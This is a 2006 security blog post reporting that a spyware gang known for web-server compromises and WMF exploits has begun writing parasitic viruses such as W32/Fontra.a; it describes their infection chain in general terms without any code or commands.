Monday, May 29, 2006

Spyware goes the parasitic way

The concept of ‘parasitic spyware’ predates the popularity of the term Spyware or Adware. W95/MTX was a parasitic virus discovered nearly six years ago and contained a backdoor (one type of spyware that allows a remote attacker control an infected computer remotely). In recent years there’s been a clear distinction between the well organized spyware creators and parasitic virus authors, but that may be changing. The group behind traffall.biz or the so-called iframecash.biz gang has begun to move into the area of parasitic virus creation, seen with the discovery of W32/Fontra.a. This is the same group who heavily exploited [Exploit-WMF] a 0-day WMF buffer overflow vulnerability around the time that it was discovered. They’re known for, among other things, hacking web servers to embed small encrypted script code that load other web pages containing various exploit code (such as Exploit-ANIFile, Exploit-ByteVerify, Exploit-CodeBase, etc). Typically the exploit code results in a downloader .EXE file being run on vulnerable systems, which then installs dozens of other downloaders, spam, proxy, and password stealing trojans. It’s also common for rogue anti-spyware scanners to get installed along the way, such as SpySheriff, Spyaxe or BraveSentry. This group keeps the target moving and appears to be well funded, which could equal a rise in the number of parasitic infectors discovered over the next several months. Who is funding those guys, organised crime? We don't know yet but time will tell...